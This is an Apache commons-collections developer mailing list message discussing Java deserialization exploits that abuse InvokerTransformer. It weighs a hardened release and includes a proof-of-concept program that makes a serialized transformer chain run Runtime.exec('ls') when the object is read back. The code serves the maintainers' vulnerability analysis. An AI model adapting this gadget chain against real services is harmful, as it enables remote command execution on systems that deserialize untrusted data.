commons-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Thomas Neidhart <thomas.neidh...@gmail.com>
Subject Re: [collection][security] InvokerTransformer missused in java object serialisation exploits
Date Fri, 06 Nov 2015 23:56:00 GMT
On 11/06/2015 10:25 PM, Bernd Eckenfels wrote:
> ello,
> 
> I came across this article:
> 
> http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
> 
> It describes attacks against common Java applications with
> pre-authentication requests using malicious Java Object serialisation.
> It builds upon the work of Gabriel Lawrence (@gebl) and Chris Frohoff
> (@frohoff) (presented on January 28th, 2015, “Marshalling Pickles”
> given at AppSecCali)
> 
> http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
> 
> The ysoserial tool has some sample payloads, two use
> commons-collection oac.collections.functors.InvokerTransformer. * 
> 
> https://github.com/frohoff/ysoserial/tree/master/src/main/java/ysoserial/payloads
> 
> The class itself is rather handy to break out of the readObject()
> chains to execute arbitrary methods.
> 
> I do'nt recall any discussion here about this
> class. Is this currently handled/reported? Of course the more general
> problem is using serialisation with untusted peers, and if
> commons-collection fixes this, there might still be other vectors, but
> still I think it would be good to do something against that "bad press"?

I was not aware of this yet, thanks for the pointers.

If we would remove the problematic classes and release a new collections
version (for the 3.x or 4.x branch) we would break source and binary
compatibility.

It might be acceptable/doable to release a collections version with an
additional maven classifier (e.g. -hardened) that removes the relevant
classes and explain the compatibility issues in detail in the release
notes. What do others think about something like that?

btw. with Java 8 you can do similar things by using serialized method
references. I did create a very simple example to illustrate the issue:

public class MyTest {

	public static void main(String[] args) throws Exception {
    	final SAM1 m1 = (SAM1 & Serializable) Runtime::getRuntime;
    	final SAM2 m2 = (SAM2 & Serializable) Runtime::exec;
    	
    	Transformer t1 = (Transformer & Serializable) (input) -> m1.action();
    	Transformer t2 = (Transformer & Serializable) (input) -> {
    		try {
    			Process p = m2.action((Runtime) input, "ls");
    			
    			String line;
    			StringBuilder output = new StringBuilder();
    			BufferedReader reader = new BufferedReader(new
InputStreamReader(p.getInputStream()));
    			while ((line = reader.readLine()) != null) {
    			    output.append(line);
    			    output.append("\n");
    			}
    			reader.close();
    			return output.toString();
    		} catch (IOException e) {
    			return null;
    		}
    	};

    	ChainedTransformer chain = new ChainedTransformer(t1, t2);
    	TransformedList list = TransformedList.transformedList(new
ArrayList(), chain);

        FileOutputStream fos = new FileOutputStream("test.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(list);
        os.close();

        FileInputStream fis = new FileInputStream("test.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        List l2 = (List)ois.readObject();

        l2.add(1);

        //Print the result
        System.out.println(l2);
        ois.close();
    }

    interface SAM1 {
	Runtime action();
    }

    interface SAM2 {
        Process action(Runtime r, String s) throws IOException;
    }

}


---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org


Mime
View raw message